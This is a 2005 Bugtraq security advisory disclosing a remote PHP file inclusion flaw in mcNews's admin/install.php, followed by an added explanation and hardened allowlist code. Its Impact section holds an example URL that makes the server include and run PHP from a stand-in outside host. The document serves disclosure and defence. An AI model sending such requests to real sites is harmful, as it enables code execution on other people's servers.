Bugtraq: PHP mcNews arbitrary file inclusion

PHP mcNews arbitrary file inclusion

From: Jonathan Whiteley <jon.whiteley_at_gmail.com>
Date: Thu, 17 Mar 2005 00:40:21 +0000

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   BadRoot Security Advisory 2005-#0x01
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thu Mar 17 2005 - 00:46 am GMT +1

Product: mcNews <=1.3 (successfully exploited on 1.3)
Vendor: http://www.phpforums.net/index.php?dir=dld (Home Page)
Type: Arbitrary file inclusion
Author: Jonathan Whiteley (Vukodlak)

Product description:
-----------------------------------

A News Management script.

Vulnerable code:
-----------------------------------

--> admin/install.php
...
33 if ($table==1)
34 {
35 include($l);
36 echo ''.$lGoAdmin.'';
37 }
...

Impact:
-----------------------------------

Anyone can inject PHP code by calling:
http://vuln-host.com/path/to/mcnews/admin/install.php?l=http://some.php/source

Solution:
-----------------------------------

Remove install.php; it's futile after the first installation.

Contact:
-----------------------------------

    IRC: irc.us.azzurra.org - #badroot - Vukodlak
    E-Mail: jon.whiteley_at_gmail.com
    HP: http://www.badroot.org

Cheers

PS: Thanks to Arak for aid ;)
Received on Mar 17 2005
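The flaw above is the classic PHP remote file inclusion pattern: a request parameter is passed straight to include(), so with allow_url_fopen (and, on PHP 5.2+, allow_url_include) enabled the interpreter fetches and executes whatever the URL points at. The advisory's fix is to delete install.php; where a language selector like this must stay, the safe shape is an allowlist lookup rather than a path. The snippet below is an added example written for this page, not code from the advisory or from mcNews, and assumes a lang/ directory of shipped language files, a made-up set of language keys, and PHP 7 or later:

```php
<?php
// Added example (not mcNews code): a hardened replacement for the
// `include($l);` pattern from admin/install.php.

// Language files live in one fixed directory. The value from the request is
// used only as a key into an allowlist, never as a path or a URL.
const LANG_DIR = __DIR__ . '/lang';
const ALLOWED_LANGS = ['en', 'de', 'fr'];   // assumed set of shipped language files

/**
 * Map a user-supplied language key to an absolute path inside LANG_DIR,
 * or return null if the key is not one we ship.
 */
function resolveLanguageFile(string $requested): ?string
{
    // Strict allowlist match: remote URLs, "../" sequences and NUL-byte
    // tricks all fail here because they are not one of the listed keys.
    if (!in_array($requested, ALLOWED_LANGS, true)) {
        return null;
    }

    $path = realpath(LANG_DIR . '/' . $requested . '.php');
    $base = realpath(LANG_DIR);

    // Second line of defence: the resolved file must exist and must still be
    // located under LANG_DIR, even if the allowlist is edited carelessly later.
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Same parameter name as the vulnerable script, but it no longer reaches include() directly.
$lang = $_GET['l'] ?? 'en';
$file = resolveLanguageFile($lang);

if ($file === null) {
    http_response_code(400);
    exit('Unknown language');
}

include $file;   // only ever one of LANG_DIR/{en,de,fr}.php
```

Two defence-in-depth settings complement the code: set allow_url_include = Off in php.ini (and allow_url_fopen = Off unless the application genuinely needs remote streams), so that even an unpatched include() cannot pull code over HTTP, and keep installers such as install.php out of the web root once installation is done, as the advisory recommends.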
